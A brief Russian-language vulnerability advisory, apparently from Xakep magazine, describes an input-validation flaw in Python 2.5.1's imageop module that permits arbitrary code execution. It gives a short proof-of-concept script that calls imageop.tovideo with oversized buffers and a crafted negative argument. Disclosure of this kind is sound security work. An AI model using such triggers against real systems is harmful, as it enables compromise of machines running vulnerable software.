Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Python 2.5.1
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в модуле imageop. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.
Пример:
#!/usr/bin/python import imageop sexshit = "a"*1603 evil = "p"*5241 connard = "s"*2000 supaire= "45"*65 print supaire connard = "cool" salope = "suceuse" dtc = imageop.tovideo(sexshit,1,4461,-2147002257) sexshit = "dtc"*52 print connard,supaire," fin de dump"